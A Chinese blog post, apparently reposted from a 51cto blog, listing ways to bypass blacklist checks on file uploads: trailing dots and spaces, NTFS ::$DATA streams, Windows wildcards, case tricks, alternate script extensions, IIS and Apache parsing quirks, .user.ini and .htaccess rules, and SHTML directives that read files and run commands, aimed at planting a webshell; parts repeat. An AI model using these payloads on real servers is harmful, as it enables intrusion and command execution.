文件上传之黑名单验证绕过
2015-09-15 13:47
411 查看
当做代码的审计或者文件搞渗文章上传的时候有时候会遇到黑名单的验证码,比如常规的一些脚本名asp php jsp这种的不允许上传,下面是我总结的一些绕过的方法
auto_prepend_file:指定在每个PHP页面执行前所要执行的代码auto_prepend_file=demo.gif (每个页面都会加载demo.gif)
小数点去绕过 demo.php.
Ads数据流 demo.php::$DATA
Ads数据流(但文件是空) demo.php:jpg
Window通配符 demo.<<< 两者相结合拿到webshellTips:直接用3就可以 只不过延伸下window通配符的方法 Window通配符可以在包含文件的时候包含c:window/temp目录临时php文件(文件包含本地测试成功 但是实际渗透很少成功 因为session文件也是php开头 如同时匹配多个文件以php开头的这种,会拿到第一个php文件,不确保是自己上传的临时文件)
本文出自 “Sanr” 博客,请务必保留此出处http://0x007.blog.51cto.com/6330498/1694928
Shtml
<!--#includefile="/home/www/user8534/nav_foot.htm"--> //可以用来读文件<!--#exec cmd="ifconfig"--> //可以用来执行命令iis解析
sanr.php;.gifsanr.asp;.jpgsanr.asp/sanr.jpg.user.ini
User.iniauto_prepend_file:指定在每个PHP页面执行前所要执行的代码auto_prepend_file=demo.gif (每个页面都会加载demo.gif)
.htaccess
AddTypeapplication/x-httpd-php .jpgWindow特性
利用空格 demo.php空格小数点去绕过 demo.php.
Ads数据流 demo.php::$DATA
Ads数据流(但文件是空) demo.php:jpg
Window通配符 demo.<<< 两者相结合拿到webshellTips:直接用3就可以 只不过延伸下window通配符的方法 Window通配符可以在包含文件的时候包含c:window/temp目录临时php文件(文件包含本地测试成功 但是实际渗透很少成功 因为session文件也是php开头 如同时匹配多个文件以php开头的这种,会拿到第一个php文件,不确保是自己上传的临时文件)
大小写绕过
aSp pHp JsP扩展名绕过
Asp:asa cer cdx Aspx: ashx asmx ascxPhp: php3 phtmlJsp: jspx jspfApache的解析
sanr.php.xxxxxx本文出自 “Sanr” 博客,请务必保留此出处http://0x007.blog.51cto.com/6330498/1694928
相关文章推荐
- Android之根据Uri获得图片或视频文件路径(解决4.4以上版本得不到路径的情况)
- OPEN(SAP) UI5 学习入门系列之三:MVC (下) - 视图与控制器
- C语言link过程详解(多文件编译过程)
- 让IE8浏览器支持Canvas
- Android之根据Uri获得图片或视频文件路径(解决4.4以上版本得不到路径的情况)
- 五个你可能闻所未闻的出色的 Ubuntu 替代发行版
- 揭秘12306技术改造(三):传统框架云化迁移到内存数据平台
- jquery常用案例
- zoj 3471 Most Powerful(状态压缩dp)
- YII的自定义路由规则类的使用(初级)
- 磁盘管理及文件系统管理
- libevent编程之bufferevent使用
- 让架构接地气,不再云里雾里
- Linux(C/C++)下的文件操作open、fopen与freopen http://blog.csdn.net/a656343072/article/details/40539889
- 将JSON串与NSArray和NSDictionary的操作进行封装
- WarShall算法--图的传递闭包(进一步演变成flayd算法)
- 拓扑排序
- 无向图--邻接矩阵、连接矩阵、深度遍历、广度遍历、生成树
- 哈夫曼树--顺序结构(建立、编码、解码)
- 哈夫曼树--链式结构(建立huffman树、编码、解码)